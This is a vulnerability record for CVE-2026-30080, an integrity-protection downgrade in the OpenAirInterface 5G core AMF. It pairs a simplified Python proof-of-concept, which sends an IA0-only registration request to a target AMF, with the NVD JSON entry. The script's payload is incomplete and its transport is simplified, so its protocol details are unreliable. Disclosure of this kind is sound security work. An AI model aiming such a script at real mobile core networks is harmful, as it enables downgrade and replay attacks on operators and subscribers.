CVE-2026-30080

# PoC Concept: OpenAirInterface Integrity Protection Downgrade # This script simulates a UE sending a Registration Request with IA0 capability. import socket # Simulated NAS payload structure # In a real scenario, this would be a binary encoded NAS PDU # 5GS Mobile Identity + Security Capabilities (IA0 only) nas_payload = bytes.fromhex( "7e00" # Protocol Discriminator: Mobility Management (MM) "41" # Message Type: Registration request # ... Mobile Identity (SUCI/SUPI) ... # ... Security Capabilities: 00000001 (Bit 0 for IA0, others 0 for NIA1/2/3) ... "01" # UE Security Capability - indicating only IA0 support ) def send_malicious_registration(amf_ip, amf_port): """ Sends a registration request claiming no integrity support (IA0) to exploit the downgrade vulnerability in OAI v2.2.0. """ try: # Establish SCTP or TCP connection to AMF (Simplified as TCP here) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((amf_ip, amf_port)) print(f"[*] Sending Registration Request with IA0 only to {amf_ip}...") sock.send(nas_payload) response = sock.recv(4096) print(f"[+] Received response from AMF: {response.hex()}") # Analyze response to check if Security Mode Command allows IA0 # If accepted, the vulnerability is confirmed. sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target AMF address TARGET_AMF_IP = "192.168.56.101" TARGET_AMF_PORT = 38412 # Standard NGAP port (SCTP usually) send_malicious_registration(TARGET_AMF_IP, TARGET_AMF_PORT)

{"cve": {"id": "CVE-2026-30080", "sourceIdentifier": "[email protected]", "published": "2026-04-08T17:21:18.623", "lastModified": "2026-04-14T15:47:10.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenAirInterface v2.2.0 accepts Security Mode Complete without any integrity protection. Configuration has supported integrity NIA1 and NIA2. But if an UE sends initial registration request with only security capability IA0, OpenAirInterface accepts and proceeds. This downgrade security context can lead to the possibility of replay attack."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-294"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1BB4900E-B5A7-40ED-8DA6-4E372D5036D9"}]}]}], "references": [{"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}